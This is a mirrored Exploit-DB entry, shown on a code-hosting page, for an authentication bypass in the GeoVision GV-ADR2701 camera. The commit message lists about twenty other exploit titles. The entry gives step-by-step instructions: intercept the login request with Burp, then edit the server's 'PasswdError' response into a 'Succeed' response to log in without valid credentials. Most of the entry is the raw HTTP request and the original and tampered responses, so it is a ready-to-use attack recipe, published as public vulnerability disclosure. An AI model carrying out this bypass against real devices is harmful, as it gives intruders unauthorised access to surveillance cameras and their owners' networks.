bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51179.txt
Exploit-DB 3de26153c8 DB: 2023-04-02 
23 changes to exploits/shellcodes/ghdb

ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)

Hughes Satellite Router HX200 v8.3.1.14 -  Remote File Inclusion

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)

TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)

GeoVision Camera GV-ADR2701 - Authentication Bypass

AD Manager Plus 7122 - Remote Code Execution (RCE)

Enlightenment v0.25.3 - Privilege escalation

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

Apache 2.4.x - Buffer Overflow

perfSONAR v4.4.5 - Partial Blind CSRF

SugarCRM 12.2.0 - Remote Code Execution (RCE)

XCMS v1.83 - Remote Command Execution (RCE)

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit

Splashtop 8.71.12001.0 - Unquoted Service Path

Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

FlipRotation v1.0 decoder - Shellcode (146 bytes)

Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)

macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
2023-04-02 00:16:21 +00:00

72 lines
No EOL
1.7 KiB
Text
Raw Blame History

# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10
# Exploitation
1. Capture The Login Request with burp, Do intercept request to response
Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1
{"UserName":"admin","Password":"0X]&0D]]05"}
```
2. The following is the normal response when you login to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```
By editing the response to the following, you can successfully log in to
the web application.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```
Reference in a new issue View git blame Copy permalink